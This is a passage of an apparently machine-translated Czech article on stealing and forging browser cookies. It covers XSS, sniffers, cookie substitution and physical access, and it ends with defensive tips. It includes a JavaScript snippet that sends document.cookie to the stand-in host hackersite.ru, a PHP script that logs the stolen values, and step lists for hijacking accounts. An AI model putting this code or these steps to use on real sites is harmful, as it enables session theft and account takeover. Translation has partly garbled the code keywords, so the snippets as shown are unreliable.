Krok 6: Chcete-li změnit některé soubory cookie, upravte soubor C:\IE_ext.htm a nahraďte jej testovací jméno ve jménu cookie, zkušební hodnota- o jeho významu, testdomain.ru– do domény webu. V případě potřeby přidejte více podobných čar. Pro usnadnění kontroly jsem do skriptu přidal výstup aktuálních souborů cookie před a po změně: alert(externí.menuArgumenty.dokument.cookie);

Krok 7: Proveďte znovu krok 5 a poté obnovte stránku.

Sečteno a podtrženo: k tomuto internetovému zdroji budeme přistupovat s aktualizovanými soubory cookie.

Jak ukrást cookies pomocí JavaScriptu?

Pokud se útočníkovi podaří najít příležitost ke spuštění libovolného skriptu JavaScript na počítači oběti, může velmi snadno číst aktuální soubory cookie. Příklad:


var str= document.cookie;

Bude je však moci přenést na svůj web, protože, jak jsem již naznačil, skript JavaScriptu nebude mít přístup k webu umístěnému na jiné doméně bez dodatečného potvrzení? Ukázalo se, že skript JavaScript může načíst jakýkoli obrázek umístěný na libovolném http serveru. Zároveň do tohoto obrázku přeneste veškeré textové informace v požadavku na stažení. Příklad: http://hackersite.ru/xss.jpg?text_info Pokud tedy spustíte tento kód:

var img= nový vzhled();

img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(dokument.cookie);


pak cookie skončí v požadavku na stažení „obrázku“ a „přejde“ k útočníkovi.

Jak takové žádosti o stažení „obrázku“ řešit?

Útočníkovi stačí najít hosting s podporou PHP a umístit tam kód takto:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Poté budou všechny parametry požadavku pro tento skript uloženy do souboru log.txt. Zbývá pouze nahradit dříve popsaný skript JavaScript http://hackersite.ru/xss.jpg na cestu k tomuto php skriptu.


Sečteno a podtrženo

Ukázal jsem pouze nejjednodušší způsob, jak využít zranitelnosti XSS. To však dokazuje, že přítomnost alespoň jedné takové chyby zabezpečení na víceuživatelském webu může útočníkovi umožnit používat jeho zdroje vaším jménem.

Soubory cookie - informace ve formě textového souboru uloženého webovou stránkou na počítači uživatele. Obsahuje autentizační údaje (login/heslo, ID, telefonní číslo, adresa schránky), uživatelská nastavení, stav přístupu. Uloženo v profilu prohlížeče.

Hackování cookies je krádež (nebo „únos“) relace návštěvníka webového zdroje. Soukromé informace se stávají dostupnými nejen odesílateli a příjemci, ale také třetí straně – osobě, která odposlech provedla.

Nástroje a techniky pro hackování souborů cookie

Počítačoví zloději, stejně jako jejich kolegové v reálném životě, mají kromě dovedností, šikovnosti a znalostí samozřejmě i vlastní nástroje – jakýsi arzenál generálních klíčů a sond. Pojďme se podívat na nejoblíbenější triky, které hackeři používají k získávání cookies z uživatelů internetu.

Čichači

Speciální programy pro sledování a analýzu síťového provozu. Jejich název pochází z anglického slovesa „sniff“ (sniff), protože. doslova „vyčuhovat“ přenášené pakety mezi uzly.

Útočníci však používají sniffer k zachycení dat relací, zpráv a dalších důvěrných informací. Cílem jejich útoků jsou především nechráněné sítě, kam se cookies odesílají v otevřené HTTP relaci, tedy prakticky nejsou šifrované. (Veřejné Wi-Fi je v tomto ohledu nejzranitelnější.)

Pro vložení snifferu do internetového kanálu mezi uživatelským uzlem a webovým serverem se používají následující metody:

  • „naslouchání“ síťovým rozhraním (huby, přepínače);
  • větvení a kopírování provozu;
  • připojení k síťovému kanálu;
  • analýzu pomocí speciálních útoků, které přesměrovávají provoz oběti na sniffer (MAC-spoofing, IP-spoofing).

Zkratka XSS znamená Cross Site Scripting. Používá se k útokům na webové stránky s cílem ukrást uživatelská data.

Princip XSS je následující:

  • útočník vloží škodlivý kód (speciální skrytý skript) na webovou stránku webu, fóra nebo do zprávy (například při korespondenci na sociální síti);
  • oběť přejde na infikovanou stránku a aktivuje nainstalovaný kód na svém PC (klikne, následuje odkaz atd.);
  • Spuštěný škodlivý kód naopak „extrahuje“ důvěrná data uživatele z prohlížeče (zejména soubory cookie) a odešle je na webový server útočníka.

Aby hackeři „implantovali“ softwarový XSS mechanismus, využívají nejrůznější zranitelnosti webových serverů, online služeb a prohlížečů.

Všechny zranitelnosti XSS jsou rozděleny do dvou typů:

  • Pasivní. Útok je získán vyžádáním konkrétního skriptu na webové stránce. Škodlivý kód lze vložit do různých formulářů na webové stránce (například do vyhledávací lišty webu). Nejnáchylnější na pasivní XSS jsou zdroje, které nefiltrují HTML tagy, když dorazí data;
  • Aktivní. Nachází se přímo na serveru. A aktivují se v prohlížeči oběti. Aktivně je využívají podvodníci ve všech druzích blogů, chatů a zpravodajských kanálů.

Hackeři pečlivě „zakamuflují“ své XSS skripty, aby oběť nic netušila. Změní příponu souboru, vydávají kód za obrázek, motivují je ke sledování odkazu a přitahují zajímavým obsahem. Výsledkem je: uživatel PC, neschopný ovládat svou vlastní zvědavost, vlastní rukou (kliknutím myši) odešle soubory cookie relace (s přihlašovacím jménem a heslem!) autorovi skriptu XSS - počítačovému padouchovi.

Nahrazení souborů cookie

Všechny soubory cookie jsou uloženy a odeslány na webový server (ze kterého „přišly“) bez jakýchkoli změn – ve své původní podobě – se stejnými hodnotami, řetězci a dalšími údaji. Záměrná úprava jejich parametrů se nazývá substituce cookies. Jinými slovy, při nahrazování cookies útočník předstírá zbožné přání. Například při platbě v internetovém obchodě změní soubor cookie částku platby směrem dolů – dochází tak k „úspoře“ na nákupech.

Ukradené soubory cookie relace na sociální síti z účtu někoho jiného se „vloží“ do jiné relace a na jiný počítač. Vlastník ukradených cookies získá plný přístup k účtu oběti (korespondence, obsah, nastavení stránky), pokud je na její stránce.

„Úprava“ cookies se provádí pomocí:

  • Funkce „Spravovat soubory cookie...“ v prohlížeči Opera;
  • Doplňky Cookies Manager a Advanced Cookie Manager pro FireFox;
  • nástroje IECookiesView (pouze Internet Explorer);
  • textový editor, jako je AkelPad, NotePad nebo Windows Notepad.

Fyzický přístup k datům

Velmi jednoduché schéma implementace, skládající se z několika kroků. Je to však účinné pouze v případě, že počítač oběti s otevřenou relací, například VKontakte, zůstane bez dozoru (a po dlouhou dobu!):

  1. Do adresního řádku prohlížeče se zadá funkce javascript pro zobrazení všech uložených souborů cookie.
  2. Po stisknutí „ENTER“ se všechny objeví na stránce.
  3. Soubory cookie se zkopírují, uloží do souboru a poté se přenesou na flash disk.
  4. Na jiném PC jsou soubory cookie nahrazeny v nové relaci.
  5. Přístup k účtu oběti je povolen.

Hackeři zpravidla používají výše uvedené nástroje (+ další) jak v kombinaci (protože úroveň ochrany na mnoha webových zdrojích je poměrně vysoká), tak samostatně (když jsou uživatelé přehnaně naivní).

XSS + čichač

  1. Vytvoří se XSS skript, který specifikuje adresu online snifferu (buď podomácku vyrobeného nebo konkrétní služby).
  2. Škodlivý kód je uložen s příponou .img (formát obrázku).
  3. Tento soubor je poté nahrán na webovou stránku, chat nebo osobní zprávu, kde bude útok proveden.
  4. Pozornost uživatele upoutá vytvořená „past“ (zde vstupuje v platnost sociální inženýrství).
  5. Pokud se past spustí, sniffer zachytí soubory cookie z prohlížeče oběti.
  6. Útočník otevře protokoly snifferu a načte ukradené cookies.
  7. Dále provede substituci k získání práv vlastníka účtu pomocí výše uvedených nástrojů.

Ochrana souborů cookie před hackováním

  1. Použijte šifrované připojení (pomocí vhodných protokolů a metod zabezpečení).
  2. Nereagujte na pochybné odkazy, obrázky nebo lákavé nabídky, abyste se seznámili s „novým svobodným softwarem“. Zejména od cizích lidí.
  3. Používejte pouze důvěryhodné webové zdroje.
  4. Ukončete autorizovanou relaci kliknutím na tlačítko „Odhlásit“ (ne pouze zavřením karty!). Zvláště pokud jste se ke svému účtu nepřihlásili z osobního počítače, ale například z počítače v internetové kavárně.
  5. Nepoužívejte v prohlížeči funkci „Uložit heslo“. Uložená registrační data výrazně zvyšují riziko krádeže. Nebuďte líní, neztrácejte pár minut času zadáváním hesla a přihlašováním na začátku každé relace.
  6. Po procházení webu – návštěvě sociálních sítí, fór, chatů, webových stránek – smažte uložené soubory cookie a vymažte mezipaměť prohlížeče.
  7. Pravidelně aktualizujte prohlížeče a antivirový software.
  8. Používejte rozšíření prohlížeče, která chrání před útoky XSS (například NoScript pro FF a Google Chrome).
  9. Pravidelně na účtech.

A hlavně neztrácejte ostražitost a pozornost při odpočinku nebo práci na internetu!

říct přátelům